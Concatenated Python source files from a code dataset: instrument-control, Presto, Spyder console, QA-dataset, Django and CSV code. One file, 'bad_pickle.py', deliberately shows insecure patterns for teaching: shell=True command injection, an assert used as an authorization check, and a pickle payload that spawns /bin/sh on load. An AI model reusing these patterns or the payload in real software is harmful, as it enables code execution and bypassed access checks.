def _query(self,msg):
# note: OSA is case sensitive!
self._osa.write(unicode(msg))
time.sleep(self._query_delay)
return self._osa.read_raw(self._read_n)
def _write(self,msg):
# note: OSA is case sensitive!
time.sleep(self._query_delay) # give it time to process the old orders.
self._osa.write(unicode(msg))
def close(self):
# put OSA back to local operation
#GPIB.write('loc'), should be in regular .close():
self._osa.close()
def set_sensitivity(self,sensitivity=None):
if sensitivity is not None:
self._write('SENS {0}DBM'.format(sensitivity))
return float(self._query('SENS?'.format(sensitivity)))
def set_wavelength_center(self,lambd):
return float(self._query('CENTERWL {0}NM;CENTERWL?'.format(lambd)))
def set_wavelength_span(self,span):
# set wavelength range symmetrically around the center wavelength CENTERWL
# It's equal to SP = STOPWL - STARTWL
return float(self._query('SP {0}NM;SP?'.format(span)))
def read_wavelength_range(self):
return [float(self._query('STARTWL?')), float(self._query('STOPWL?'))]
def measure(self,timed=True):
# if timed: return yields measured result AND time it needed to execute
# TDF [P,M,B,A,I] to set the requested output format: (decimal, integer, binary, 8-bit format, other 8-bit format)
# TRA? request stored trace data in A (technically there is also TRB,TRC)
t0 = time.time() # init for case of exception
if timed:
t0 = time.time()
return self._query('TDF P;TRA?').split(','), time.time()-t0
else:
return self._query('TDF P;TRA?').split(',')
class HeatSink(object):
def __init__(self,resourcemanager,address):
_hs = resourcemanager.open_resource(address)
_hs.write(r'*CLS') # clear status; all event registers and error queue
self._idn = vparse(_hs.query(r'*IDN?'),2) # identification code of meter itself
self._mode = vparse(_hs.query(r'TEC:MODE?'),2) # mode: ITE (TEC current), R (resistance/reference) or T (temperature)
self._hs = _hs
def __str__(self):
return ';'.join([self._idn,self._mode])
def set_temperature(self,T=None):
if T is not None:
raw_input('Set temperature MANUALLY and confirm: {0}'.format(T))
return self.read_temperature()
def read_temperature(self):
return self._hs.query_ascii_values(r'TEC:T?')[0]
def close(self):
self._hs.close()
#=======================================================================================
ResourceManager = lambda : visa.ResourceManager()
def main():
rm = visa.ResourceManager()
print rm.list_resources(query=u'?*')
"""
u'PXI5::1::INSTR' n/a
u'PXI5::2::INSTR' frame grabber card: open NI-MAX to controll
u'ASRL1::INSTR' power source, i.e. pump controll
u'ASRL10::INSTR' n/a
u'GPIB0::1::INSTR' Orion AD100 actuator
u'GPIB0::2::INSTR' Orion Power Meter (n/a)
u'GPIB0::4::INSTR' n/a
u'GPIB0::5::INSTR' Newport TEC
u'GPIB0::9::INSTR' spectrometer
"""
osa = SpectroMeter(rm,u'GPIB0::9::INSTR')
ps = PowerSource(rm,u'ASRL1::INSTR')
hs = HeatSink(rm,u'GPIB0::5::INSTR')
pm = PowerMeter(rm,u'USB0::0x1313::0x8078::P0004893::INSTR')
print pm
print pm.get_statset()
print pm.average_over(200)
#print pm.set_wavelength(1270)
print pm.measure()
if __name__ == '__main__': main()
| 46.087054 | 165 | 0.6368 |
319fee2009b78b5a9322d592f03bce777ef91de1 | 1,977 | py | Python | components/presto/query/src/program.py | Iuiu1234/pipelines | 1e032f550ce23cd40bfb6827b995248537b07d08 | [
"Apache-2.0"
] | 2,860 | 2018-05-24T04:55:01.000Z | 2022-03-31T13:49:56.000Z | components/presto/query/src/program.py | Iuiu1234/pipelines | 1e032f550ce23cd40bfb6827b995248537b07d08 | [
"Apache-2.0"
] | 7,331 | 2018-05-16T09:03:26.000Z | 2022-03-31T23:22:04.000Z | components/presto/query/src/program.py | Iuiu1234/pipelines | 1e032f550ce23cd40bfb6827b995248537b07d08 | [
"Apache-2.0"
] | 1,359 | 2018-05-15T11:05:41.000Z | 2022-03-31T09:42:09.000Z | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from pyhive import presto
def get_conn(host=None, catalog=None, schema=None, user=None, pwd=None):
conn = presto.connect(
host=host,
port=443,
protocol="https",
catalog=catalog,
schema=schema,
username=user,
password=pwd,
)
return conn
def query(conn, query):
cursor = conn.cursor()
cursor.execute(query)
cursor.fetchall()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--host", type=str, help="Presto Host.")
parser.add_argument(
"--catalog", type=str, required=True, help="The name of the catalog."
)
parser.add_argument(
"--schema", type=str, required=True, help="The name of the schema."
)
parser.add_argument(
"--query",
type=str,
required=True,
help="The SQL query statements to be executed in Presto.",
)
parser.add_argument(
"--user", type=str, required=True, help="The user of the Presto."
)
parser.add_argument(
"--pwd", type=str, required=True, help="The password of the Presto."
)
parser.add_argument(
"--output",
type=str,
required=True,
help="The path or name of the emitted output.",
)
args = parser.parse_args()
conn = get_conn(args.host, args.catalog, args.schema, args.user, args.pwd)
query(conn, args.query)
with open("/output.txt", "w+") as w:
w.write(args.output)
if __name__ == "__main__":
main()
| 26.013158 | 76 | 0.674254 |
bafc0c554f707c9d1f0aba12411100875fdb17b9 | 19,762 | py | Python | spyder/plugins/console/widgets/main_widget.py | mehrdad-shokri/spyder | 3bf92535cc52b030a4a2a089fc904f4cc835be5c | [
"MIT"
] | null | null | null | spyder/plugins/console/widgets/main_widget.py | mehrdad-shokri/spyder | 3bf92535cc52b030a4a2a089fc904f4cc835be5c | [
"MIT"
] | null | null | null | spyder/plugins/console/widgets/main_widget.py | mehrdad-shokri/spyder | 3bf92535cc52b030a4a2a089fc904f4cc835be5c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Main Console widget.
"""
# pylint: disable=C0103
# pylint: disable=R0903
# pylint: disable=R0911
# pylint: disable=R0201
# Standard library imports
import logging
import os
import os.path as osp
import sys
# Third party imports
from qtpy.compat import getopenfilename
from qtpy.QtCore import Qt, Signal, Slot
from qtpy.QtWidgets import QInputDialog, QLineEdit, QMenu, QVBoxLayout
# Local imports
from spyder.api.plugins import (SpyderPlugin, SpyderPluginV2,
SpyderDockablePlugin)
from spyder.api.translations import get_translation
from spyder.api.widgets import PluginMainWidget
from spyder.app.solver import find_internal_plugins
from spyder.config.base import DEV, get_debug_level
from spyder.plugins.console.widgets.internalshell import InternalShell
from spyder.py3compat import to_text_string
from spyder.utils.environ import EnvDialog
from spyder.utils.misc import (get_error_match, getcwd_or_home,
remove_backslashes)
from spyder.utils.qthelpers import DialogManager, mimedata2url
from spyder.widgets.collectionseditor import CollectionsEditor
from spyder.widgets.findreplace import FindReplace
from spyder.widgets.reporterror import SpyderErrorDialog
# Localization
_ = get_translation('spyder')
logger = logging.getLogger(__name__)
# --- Constants
# ----------------------------------------------------------------------------
class ConsoleWidgetActions:
# Triggers
Environment = 'environment_action'
ExternalEditor = 'external_editor_action'
MaxLineCount = 'max_line_count_action'
Quit = 'quit_action'
Run = 'run_action'
SysPath = 'sys_path_action'
# Toggles
ToggleCodeCompletion = 'toggle_code_completion_action'
ToggleWrap = 'toggle_wrap_action'
class ConsoleWidgetMenus:
InternalSettings = 'internal_settings_submenu'
class ConsoleWidgetOptionsMenuSections:
Run = 'run_section'
Quit = 'quit_section'
class ConsoleWidgetInternalSettingsSubMenuSections:
Main = 'main'
# --- Widgets
# ----------------------------------------------------------------------------
class ConsoleWidget(PluginMainWidget):
DEFAULT_OPTIONS = {
'codecompletion/auto': True,
'commands': [],
'external_editor/gotoline': '',
'external_editor/path': '',
'max_line_count': 300,
'message': 'Internal console\n\n',
'multithreaded': False,
'namespace': None,
'profile': False,
'show_internal_errors': True,
'wrap': True,
# From appearance
'color_theme': 'spyder/dark',
}
# --- Signals
# This signal emits a parsed error traceback text so we can then
# request opening the file that traceback comes from in the Editor.
sig_edit_goto_requested = Signal(str, int, str)
# TODO: I do not think we use this?
sig_focus_changed = Signal()
# Emit this when the interpreter buffer is flushed
sig_refreshed = Signal()
# Request to show a status message on the main window
sig_show_status_requested = Signal(str)
# Request the main application to quit.
sig_quit_requested = Signal()
sig_help_requested = Signal(dict)
"""
This signal is emitted to request help on a given object `name`.
Parameters
----------
help_data: dict
Example `{'name': str, 'ignore_unknown': bool}`.
"""
def __init__(self, name, plugin, parent=None, options=DEFAULT_OPTIONS):
super().__init__(name, plugin, parent, options)
logger.info("Initializing...")
# Traceback MessageBox
self.error_traceback = ''
self.dismiss_error = False
# Widgets
self.dialog_manager = DialogManager()
self.error_dlg = None
self.shell = InternalShell( # TODO: Move to use SpyderWidgetMixin?
parent=parent,
namespace=self.get_option('namespace'),
commands=self.get_option('commands'),
message=self.get_option('message'),
max_line_count=self.get_option('max_line_count'),
profile=self.get_option('profile'),
multithreaded=self.get_option('multithreaded'),
)
self.find_widget = FindReplace(self)
# Setup
self.setAcceptDrops(True)
self.find_widget.set_editor(self.shell)
self.find_widget.hide()
self.shell.toggle_wrap_mode(self.get_option('wrap'))
# Layout
layout = QVBoxLayout()
layout.addWidget(self.shell)
layout.addWidget(self.find_widget)
self.setLayout(layout)
# Signals
self.shell.sig_help_requested.connect(self.sig_help_requested)
self.shell.sig_exception_occurred.connect(self.handle_exception)
self.shell.sig_focus_changed.connect(self.sig_focus_changed)
self.shell.sig_go_to_error_requested.connect(self.go_to_error)
self.shell.sig_redirect_stdio_requested.connect(
self.sig_redirect_stdio_requested)
self.shell.sig_refreshed.connect(self.sig_refreshed)
self.shell.sig_show_status_requested.connect(
lambda msg: self.sig_show_status_message.emit(msg, 0))
# --- PluginMainWidget API
# ------------------------------------------------------------------------
def get_title(self):
return _('Internal console')
def setup(self, options):
# TODO: Move this to the shell
quit_action = self.create_action(
ConsoleWidgetActions.Quit,
text=_("&Quit"),
tip=_("Quit"),
icon=self.create_icon('exit'),
triggered=self.sig_quit_requested,
context=Qt.ApplicationShortcut,
)
run_action = self.create_action(
ConsoleWidgetActions.Run,
text=_("&Run..."),
tip=_("Run a Python script"),
icon=self.create_icon('run_small'),
triggered=self.run_script,
)
environ_action = self.create_action(
ConsoleWidgetActions.Environment,
text=_("Environment variables..."),
tip=_("Show and edit environment variables (for current "
"session)"),
icon=self.create_icon('environ'),
triggered=self.show_env,
)
syspath_action = self.create_action(
ConsoleWidgetActions.SysPath,
text=_("Show sys.path contents..."),
tip=_("Show (read-only) sys.path"),
icon=self.create_icon('syspath'),
triggered=self.show_syspath,
)
buffer_action = self.create_action(
ConsoleWidgetActions.MaxLineCount,
text=_("Buffer..."),
tip=_("Set maximum line count"),
triggered=self.change_max_line_count,
)
exteditor_action = self.create_action(
ConsoleWidgetActions.ExternalEditor,
text=_("External editor path..."),
tip=_("Set external editor executable path"),
triggered=self.change_exteditor,
)
wrap_action = self.create_action(
ConsoleWidgetActions.ToggleWrap,
text=_("Wrap lines"),
toggled=lambda val: self.set_option('wrap', val),
initial=self.get_option('wrap'),
)
codecompletion_action = self.create_action(
ConsoleWidgetActions.ToggleCodeCompletion,
text=_("Automatic code completion"),
toggled=lambda val: self.set_option('codecompletion/auto', val),
initial=self.get_option('codecompletion/auto'),
)
# Submenu
internal_settings_menu = self.create_menu(
ConsoleWidgetMenus.InternalSettings,
_('Internal console settings'),
)
for item in [buffer_action, wrap_action, codecompletion_action,
exteditor_action]:
self.add_item_to_menu(
item,
menu=internal_settings_menu,
section=ConsoleWidgetInternalSettingsSubMenuSections.Main,
)
# Options menu
options_menu = self.get_options_menu()
for item in [run_action, environ_action, syspath_action,
internal_settings_menu]:
self.add_item_to_menu(
item,
menu=options_menu,
section=ConsoleWidgetOptionsMenuSections.Run,
)
self.add_item_to_menu(
quit_action,
menu=options_menu,
section=ConsoleWidgetOptionsMenuSections.Quit,
)
self.shell.set_external_editor(
self.get_option('external_editor/path'), '')
def on_option_update(self, option, value):
if option == 'max_line_count':
self.shell.setMaximumBlockCount(value)
elif option == 'wrap':
self.shell.toggle_wrap_mode(value)
elif option == 'codecompletion/auto':
self.shell.set_codecompletion_auto(value)
elif option == 'external_editor/path':
self.shell.set_external_editor(value, '')
def update_actions(self):
# This method is a required part of the PluginMainWidget API. On this
# widget it is not currently used.
pass
def get_focus_widget(self):
return self.shell
# --- Qt overrides
# ------------------------------------------------------------------------
def dragEnterEvent(self, event):
"""
Reimplement Qt method.
Inform Qt about the types of data that the widget accepts.
"""
source = event.mimeData()
if source.hasUrls():
if mimedata2url(source):
event.acceptProposedAction()
else:
event.ignore()
elif source.hasText():
event.acceptProposedAction()
def dropEvent(self, event):
"""
Reimplement Qt method.
Unpack dropped data and handle it.
"""
source = event.mimeData()
if source.hasUrls():
pathlist = mimedata2url(source)
self.shell.drop_pathlist(pathlist)
elif source.hasText():
lines = to_text_string(source.text())
self.shell.set_cursor_position('eof')
self.shell.execute_lines(lines)
event.acceptProposedAction()
# --- Public API
# ------------------------------------------------------------------------
def start_interpreter(self, namespace):
"""
Start internal console interpreter.
"""
self.shell.start_interpreter(namespace)
def set_historylog(self, historylog):
"""
Bind historylog instance to this console.
Not used anymore since v2.0.
"""
historylog.add_history(self.shell.history_filename)
self.shell.append_to_history.connect(historylog.append_to_history)
def set_help(self, help_plugin):
"""
Bind help instance to this console.
"""
self.shell.help = help_plugin
@Slot(dict)
def handle_exception(self, error_data, sender=None, internal_plugins=None):
"""
Exception ocurred in the internal console.
Show a QDialog or the internal console to warn the user.
Handle any exception that occurs during Spyder usage.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
sender: spyder.api.plugins.SpyderPluginV2, optional
The sender plugin. Default is None.
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
text = error_data.get("text", None)
is_traceback = error_data.get("is_traceback", False)
title = error_data.get("title", "")
label = error_data.get("label", "")
steps = error_data.get("steps", "")
# Skip errors without traceback (and no text) or dismiss
if ((not text and not is_traceback and self.error_dlg is None)
or self.dismiss_error):
return
if internal_plugins is None:
internal_plugins = find_internal_plugins()
if internal_plugins:
internal_plugin_names = []
for __, val in internal_plugins.items():
name = getattr(val, 'NAME', getattr(val, 'CONF_SECTION'))
internal_plugin_names.append(name)
sender_name = getattr(val, 'NAME', getattr(val, 'CONF_SECTION'))
is_internal_plugin = sender_name in internal_plugin_names
else:
is_internal_plugin = False
repo = "spyder-ide/spyder"
if sender is not None and not is_internal_plugin:
repo = error_data.get("repo", None)
try:
plugin_name = sender.NAME
except Exception:
plugin_name = sender.CONF_SECTION
if repo is None:
raise Exception(
'External plugin "{}" does not define "repo" key in '
'the "error_data" dictionary!'.format(plugin_name)
)
if self.get_option('show_internal_errors'):
if self.error_dlg is None:
self.error_dlg = SpyderErrorDialog(self)
self.error_dlg.set_color_scheme(self.get_option('color_theme'))
self.error_dlg.close_btn.clicked.connect(self.close_error_dlg)
self.error_dlg.rejected.connect(self.remove_error_dlg)
self.error_dlg.details.go_to_error.connect(self.go_to_error)
# Set the report repository
self.error_dlg.set_github_repo_org(repo)
if title:
self.error_dlg.set_title(title)
self.error_dlg.title.setEnabled(False)
if label:
self.error_dlg.main_label.setText(label)
self.error_dlg.submit_btn.setEnabled(True)
if steps:
self.error_dlg.steps_text.setText(steps)
self.error_dlg.set_require_minimum_length(False)
self.error_dlg.append_traceback(text)
self.error_dlg.show()
elif DEV or get_debug_level():
self.change_visibility(True, True)
def close_error_dlg(self):
"""
Close error dialog.
"""
if self.error_dlg.dismiss_box.isChecked():
self.dismiss_error = True
self.error_dlg.reject()
def remove_error_dlg(self):
"""
Remove error dialog.
"""
self.error_dlg = None
@Slot()
def show_env(self):
"""
Show environment variables.
"""
self.dialog_manager.show(EnvDialog(parent=self))
def get_sys_path(self):
"""
Return the `sys.path`.
"""
return sys.path
@Slot()
def show_syspath(self):
"""
Show `sys.path`.
"""
editor = CollectionsEditor(parent=self)
editor.setup(
sys.path,
title="sys.path",
readonly=True,
icon=self.create_icon('syspath'),
)
self.dialog_manager.show(editor)
@Slot()
def run_script(self, filename=None, silent=False, set_focus=False,
args=None):
"""
Run a Python script.
"""
if filename is None:
self.shell.interpreter.restore_stds()
filename, _selfilter = getopenfilename(
self,
_("Run Python script"),
getcwd_or_home(),
_("Python scripts") + " (*.py ; *.pyw ; *.ipy)",
)
self.shell.interpreter.redirect_stds()
if filename:
os.chdir(osp.dirname(filename))
filename = osp.basename(filename)
else:
return
logger.debug("Running script with %s", args)
filename = osp.abspath(filename)
rbs = remove_backslashes
command = "runfile('%s', args='%s')" % (rbs(filename), rbs(args))
if set_focus:
self.shell.setFocus()
self.change_visibility(True, True)
self.shell.write(command+'\n')
self.shell.run_command(command)
def go_to_error(self, text):
"""
Go to error if relevant.
"""
match = get_error_match(to_text_string(text))
if match:
fname, lnb = match.groups()
self.edit_script(fname, int(lnb))
def edit_script(self, filename=None, goto=-1):
"""
Edit script.
"""
if filename is not None:
# Called from InternalShell
self.shell.external_editor(filename, goto)
self.sig_edit_goto_requested.emit(osp.abspath(filename), goto, '')
def execute_lines(self, lines):
"""
Execute lines and give focus to shell.
"""
self.shell.execute_lines(to_text_string(lines))
self.shell.setFocus()
@Slot()
def change_max_line_count(self, value=None):
""""
Change maximum line count.
"""
valid = True
if value is None:
value, valid = QInputDialog.getInt(
self,
_('Buffer'),
_('Maximum line count'),
self.get_option('max_line_count'),
0,
1000000,
)
if valid:
self.set_option('max_line_count', value)
@Slot()
def change_exteditor(self, path=None):
"""
Change external editor path.
"""
valid = True
if path is None:
path, valid = QInputDialog.getText(
self,
_('External editor'),
_('External editor executable path:'),
QLineEdit.Normal,
self.get_option('external_editor/path'),
)
if valid:
self.set_option('external_editor/path', to_text_string(path))
def set_exit_function(self, func):
"""
Set the callback function to execute when the `exit_interpreter` is
called.
"""
self.shell.exitfunc = func
def set_font(self, font):
"""
Set font of the internal shell.
"""
self.shell.set_font(font)
def redirect_stds(self):
"""
Redirect stdout and stderr when using open file dialogs.
"""
self.shell.interpreter.redirect_stds()
def restore_stds(self):
"""
Restore stdout and stderr when using open file dialogs.
"""
self.shell.interpreter.restore_stds()
def set_namespace_item(self, name, item):
"""
Add an object to the namespace dictionary of the internal console.
"""
self.shell.interpreter.namespace[name] = item
def exit_interpreter(self):
"""
Exit the internal console interpreter.
This is equivalent to requesting the main application to quit.
"""
self.shell.exit_interpreter()
| 31.977346 | 79 | 0.586226 |
d9eb5a7787db50d7b723bf2048c4ae363ea8ac25 | 6,206 | py | Python | utils/create_dataset_multiplechoice.py | nlpunibo/Qustion-Answering-Squad-extension | 59f8c3a7965212dd01e21e1bc907a3b805e34aff | [
"MIT"
] | null | null | null | utils/create_dataset_multiplechoice.py | nlpunibo/Qustion-Answering-Squad-extension | 59f8c3a7965212dd01e21e1bc907a3b805e34aff | [
"MIT"
] | null | null | null | utils/create_dataset_multiplechoice.py | nlpunibo/Qustion-Answering-Squad-extension | 59f8c3a7965212dd01e21e1bc907a3b805e34aff | [
"MIT"
] | null | null | null | import argparse
import pandas as pd
from utils.utils import *
from models.models import *
from pathlib import Path
from datasets import load_dataset
from tqdm import tqdm
from transformers import AutoTokenizer, TrainingArguments, Trainer
def main():
parser = argparse.ArgumentParser(description='Argument parser')
parser.add_argument("path_to_json_file", help="Path to the json file", type=str)
args = parser.parse_args()
# Set the seed for reproducibility
fix_random(seed=42)
# Load the data
data_path = Path(args.path_to_json_file).parent
train_data = load_dataset('json', data_files=args.path_to_json_file, field='data')
train_dataframe = pd.json_normalize(get_json_data(args.path_to_json_file), record_path='data', sep='_')
train_dataframe["answers_text"] = train_dataframe["answers_text"].apply(get_text)
# Preprocessing the test data
# Before we can feed those texts to our model, we need to preprocess them.
# This is done by a Transformers Tokenizer which will(as the name indicates) tokenize
# the inputs(including converting the tokens to their corresponding IDs in the pretrained
# vocabulary) and put it in a format the model expects, as well as generate the
# other inputs that model requires.
# To do all of this, we instantiate our tokenizer
# with the AutoTokenizer.from_pretrained method, which will ensure:
# - we get a tokenizer that corresponds to the model architecture we
# want to use,
# - we download the vocabulary used when pretraining this specific
# checkpoint.
# As model_checkpoint we use the best performing version of our DistilBertForQuestionAnswering which we
# have uploaded on the HuggingFace Hub
model_checkpoint = "nlpunibo/distilbert_config3"
tokenizer = AutoTokenizer.from_pretrained(model_checkpoint)
# The maximum length of a feature (question and context)
max_length = 384
# The authorized overlap between two part of the context when splitting it is needed.
doc_stride = 128
# Our model expects padding on the right
pad_on_right = True
squad = SQUAD(tokenizer, pad_on_right, max_length, doc_stride)
# We can download the pretrained model.
# We use our modified version of the `DistilBertForQuestionAnswering` class.
# Like with the tokenizer, the `from_pretrained` method will download and cache the model for us.
model = DistilBertForQuestionAnswering.from_pretrained(model_checkpoint)
# Tell pytorch to run this model on the GPU.
if torch.cuda.is_available():
model.cuda()
# We instantiate a `Trainer`, that will be used to get the predictions.
# Note: This is not necessary, but using the Trainer instead of directly the model to get the predictions simplify this operation.
args = TrainingArguments(
output_dir='../src/results',
label_names=["start_positions", "end_positions"]
)
trainer = Trainer(model, args)
# The only point left is how to check a given span is inside the context (and not the question) and how to get back the text inside.
# To do this, we need to add two things to our test features:
# - the ID of the example that generated the feature (since each example can generate several features, as seen before);
# - the offset mapping that will give us a map from token indices to character positions in the context.
# That's why we will process the test set with the prepare_validation_features
print("Preparing the test data:")
train_features = train_data['train'].map(squad.prepare_validation_features, batched=True,
remove_columns=train_data['train'].column_names)
# Get final predictions
with torch.no_grad():
pred = trainer.predict(train_features)
# The Trainer hides the columns that are not used by the model (here example_id and offset_mapping which we will need for our post-processing), so we set them back
train_features.set_format(type=train_features.format["type"],
columns=list(train_features.features.keys()))
# To get the final predictions we can apply our post-processing function to our raw predictions
final_predictions = squad.postprocess_qa_predictions(train_data['train'], train_features, pred.predictions)
formatted_predictions = {k: v for k, v in final_predictions.items()}
# Create the dataset
dataset_multiple_choice = pd.DataFrame.copy(train_dataframe)
# Create a new columns for the five answers and the label(index of the correct one)
dataset_multiple_choice['answer1'] = ''
dataset_multiple_choice['answer2'] = ''
dataset_multiple_choice['answer3'] = ''
dataset_multiple_choice['answer4'] = ''
dataset_multiple_choice['answer5'] = ''
dataset_multiple_choice['label'] = ''
for i, id in enumerate(tqdm(formatted_predictions.keys())):
if dataset_multiple_choice.answers_text.iloc[i] not in formatted_predictions[id]:
formatted_predictions[id] = formatted_predictions[id][:-1]
formatted_predictions[id].insert(0, dataset_multiple_choice.answers_text.iloc[i])
# Shuffle the answers
random.shuffle(formatted_predictions[id])
formatted_predictions[id] = formatted_predictions[id] + ['[PAD]'] * (5 - len(formatted_predictions[id]))
dataset_multiple_choice['answer1'].iloc[i] = formatted_predictions[id][0]
dataset_multiple_choice['answer2'].iloc[i] = formatted_predictions[id][1]
dataset_multiple_choice['answer3'].iloc[i] = formatted_predictions[id][2]
dataset_multiple_choice['answer4'].iloc[i] = formatted_predictions[id][3]
dataset_multiple_choice['answer5'].iloc[i] = formatted_predictions[id][4]
dataset_multiple_choice['label'].iloc[i] = formatted_predictions[id].index(
dataset_multiple_choice.answers_text.iloc[i])
dataset_multiple_choice.to_csv(str(data_path / + "dataset_multiple_choice.csv"), encoding='utf-8')
if __name__ == '__main__':
main()
| 48.484375 | 168 | 0.711247 |
af4ba4e220dfe67301bb7f9bc65c8c2c3383ca27 | 1,610 | py | Python | baccoapp/mysandwich/migrations/0001_initial.py | msienkiewicz7/baccoapp | d647ca205fdf06fe57fda7b6db164ae7d3387dad | [
"MIT"
] | null | null | null | baccoapp/mysandwich/migrations/0001_initial.py | msienkiewicz7/baccoapp | d647ca205fdf06fe57fda7b6db164ae7d3387dad | [
"MIT"
] | null | null | null | baccoapp/mysandwich/migrations/0001_initial.py | msienkiewicz7/baccoapp | d647ca205fdf06fe57fda7b6db164ae7d3387dad | [
"MIT"
] | null | null | null | # Generated by Django 2.2 on 2019-06-14 16:27
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Ingredient',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('full_name', models.CharField(max_length=255)),
('type', models.CharField(choices=[('BREAD', 'Bread'), ('BASE', 'Base'), ('CHEESE', 'Cheese'), ('VEGETABLE', 'Vegetable'), ('CONDIMENT', 'Contiment'), ('EXTRAS', 'Extras')], max_length=50)),
('calories', models.IntegerField(default=0)),
('is_vegetarian', models.BooleanField()),
('is_vegan', models.BooleanField()),
('img', models.FileField(upload_to='ingredients')),
('price', models.DecimalField(decimal_places=2, max_digits=3)),
],
),
migrations.CreateModel(
name='Sandwich',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('pub_date', models.DateTimeField(verbose_name='date created')),
('price', models.DecimalField(decimal_places=2, max_digits=4)),
('ingredients', models.ManyToManyField(to='mysandwich.Ingredient')),
],
),
]
| 41.282051 | 206 | 0.567081 |
3a2dde16596b04d583cb14b7058dc6d93c63a429 | 305 | py | Python | tasks/read_csv_file.py | Adamage/python-training | dd58868420656dc575c4a32304028bdd0215f415 | [
"Apache-2.0"
] | 2 | 2018-09-06T15:29:25.000Z | 2019-09-18T08:59:24.000Z | tasks/read_csv_file.py | Adamage/python-training | dd58868420656dc575c4a32304028bdd0215f415 | [
"Apache-2.0"
] | 1 | 2017-09-13T17:31:43.000Z | 2021-03-15T14:59:50.000Z | tasks/read_csv_file.py | Adamage/python-training | dd58868420656dc575c4a32304028bdd0215f415 | [
"Apache-2.0"
] | null | null | null | with open('example.csv') as file:
headers = file.readline().replace("\n","").split(",")
data = []
for line in file:
data.append(line.replace("\n","").split(","))
for record in data:
record_dictionary = {k:v for k,v in zip(headers,record)}
print(record_dictionary)
| 30.5 | 64 | 0.586885 |
6a3701a4568bf0c34cdbda146f2705b8611c34e3 | 775 | py | Python | vtp/admin.py | CzechInvest/ciis | c6102598f564a717472e5e31e7eb894bba2c8104 | [
"MIT"
] | 1 | 2019-05-26T22:24:01.000Z | 2019-05-26T22:24:01.000Z | vtp/admin.py | CzechInvest/ciis | c6102598f564a717472e5e31e7eb894bba2c8104 | [
"MIT"
] | 6 | 2019-01-22T14:53:43.000Z | 2020-09-22T16:20:28.000Z | vtp/admin.py | CzechInvest/ciis | c6102598f564a717472e5e31e7eb894bba2c8104 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import VtpType, Service, Vtp
from leaflet.admin import LeafletGeoAdmin, LeafletGeoAdminMixin
from cigeo.admin import ArealFieldAdmin
class VtpAdmin(ArealFieldAdmin, LeafletGeoAdmin):
list_display = (
"name", "my_type", "my_services", "url")
change_list_template = "admin/change_list-map.html"
raw_id_fields = ("address",)
default_zoom = 7
default_lon = 1730000
default_lat = 6430000
def my_type(self, obj):
return ", ".join([str(i) for i in obj.type.all()])
def my_services(self, obj):
return ", ".join([str(i) for i in obj.services.all()])
# Register your models here.
admin.site.register(VtpType)
admin.site.register(Service)
admin.site.register(Vtp, VtpAdmin)
| 28.703704 | 63 | 0.703226 |
76496ba1d10857a138c998d2c7770c8581d3cfc1 | 680 | py | Python | bad_pickle.py | ProjectG77/pv080_test_py | 93a5cb6da555fe5e3fcc82e251b3000a72ac5295 | [
"MIT"
] | null | null | null | bad_pickle.py | ProjectG77/pv080_test_py | 93a5cb6da555fe5e3fcc82e251b3000a72ac5295 | [
"MIT"
] | null | null | null | bad_pickle.py | ProjectG77/pv080_test_py | 93a5cb6da555fe5e3fcc82e251b3000a72ac5295 | [
"MIT"
] | null | null | null | # contains bunch of buggy examples
# taken from https://hackernoon.com/10-common-security-gotchas-in-python-and-how-to-avoid-them-e19fbe265e03
import cPickle
import subprocess
import base64
import subprocess
# Input injection
def transcode_file(request, filename):
command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
subprocess.call(command, shell=True) # a bad idea!
# Assert statements
def foo(request, user):
assert user.is_admin, 'user does not have access'
# secure code...
# Pickles
class RunBinSh(object):
def __reduce__(self):
return (subprocess.Popen, (('/bin/sh',),))
print(base64.b64encode(cPickle.dumps(RunBinSh())))
| 23.448276 | 107 | 0.736765 |
4eab20a8be939ab1a4bc146e735f583eb03cde18 | 1,523 | py | Python | src/robotide/lib/robot/utils/compress.py | veryl-technologies/t24-tests-ide | 16cd803895916a785c0e1fec3f71f9388c21edc9 | [
"ECL-2.0",
"Apache-2.0"
] | 8 | 2015-09-10T07:45:58.000Z | 2020-04-13T06:25:06.000Z | src/robotide/lib/robot/utils/compress.py | veryl-technologies/t24-tests-ide | 16cd803895916a785c0e1fec3f71f9388c21edc9 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2020-08-03T10:01:06.000Z | 2020-08-03T10:01:06.000Z | src/robotide/lib/robot/utils/compress.py | veryl-technologies/t24-tests-ide | 16cd803895916a785c0e1fec3f71f9388c21edc9 | [
"ECL-2.0",
"Apache-2.0"
] | 10 | 2015-10-06T13:29:50.000Z | 2021-05-31T01:04:01.000Z | # Copyright 2008-2012 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import sys
def compress_text(text):
return base64.b64encode(_compress(text.encode('UTF-8')))
if not sys.platform.startswith('java'):
import zlib
def _compress(text):
